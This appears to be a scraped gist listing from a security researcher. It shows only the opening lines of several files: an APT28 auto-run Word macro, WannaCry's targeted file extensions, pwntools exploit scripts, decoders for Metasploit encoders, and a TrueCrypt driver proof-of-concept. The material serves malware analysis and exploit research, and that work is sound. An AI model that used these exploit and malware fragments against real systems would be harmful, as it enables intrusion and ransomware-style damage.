xpn
/ APT28 Hospitality docm VBA
Created
August 12, 2017 11:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attribute VB_Name = "ThisDocument" | |
| Attribute VB_Base = "1Normal.ThisDocument" | |
| Attribute VB_GlobalNameSpace = False | |
| Attribute VB_Creatable = False | |
| Attribute VB_PredeclaredId = True | |
| Attribute VB_Exposed = True | |
| Attribute VB_TemplateDerived = True | |
| Attribute VB_Customizable = True | |
| Sub AutoOpen() | |
| Execute |
xpn
/ wannacry_file_extensions.txt
Created
May 12, 2017 23:41
A list of file extensions searched and encrypted by the WannaCry ransomware
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .der | |
| .pfx | |
| .key | |
| .crt | |
| .csr | |
| .p12 | |
| .pem | |
| .odt | |
| .ott | |
| .sxw |
xpn
/ bigpicture-exploit.py
Created
April 25, 2017 23:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| WIDTH = 1 | |
| HEIGHT = 1000000 | |
| LOCAL = False | |
| if LOCAL: | |
| FREE_HOOK_OFFSET = -1230952 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| from scapy.utils import rdpcap | |
| import sys | |
| import struct | |
| from pwn import * | |
| MESSAGE_TYPE_SYN = 0x00 | |
| MESSAGE_TYPE_MSG = 0x1 | |
| MESSAGE_TYPE_PING = 0xFF |
xpn
/ alpha_mixed.py
Created
December 8, 2016 00:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder | |
| import r2pipe | |
| import sys | |
| def dump(addr): | |
| pass | |
| def startEsil(): | |
| r.cmd('e io.cache=true') |
xpn
/ pipe_jmp_call_additive.py
Created
December 7, 2016 17:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # r2pipe script using ESIL to decode the msfvenom jmp_call_additive XOR encoder | |
| import r2pipe | |
| import sys | |
| def dump(addr): | |
| pass | |
| def startEsil(): | |
| r.cmd('e io.cache=true') |
xpn
/ meterpreter_decode_xor.py
Created
December 7, 2016 16:54
Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder | |
| # https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/countdown.rb | |
| import r2pipe | |
| import sys | |
| def dump(addr): | |
| pass | |
| def startEsil(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| phpinfo(); | |
| ?> |
xpn
/ tc_ioctl_open_test_poc.py
Last active
December 21, 2019 07:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| from ctypes import * | |
| FILE_DEVICE_UNKNOWN = 0x00000022 | |
| METHOD_BUFFERED = 0 | |
| FILE_ANY_ACCESS = 0 | |
| TC_MAX_PATH = 260 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| void print_success(void *input) { | |
| if (*(char *)(input+1) == 'Y') { | |
| printf("GOT: %s\n", input); | |
| return; | |
| } |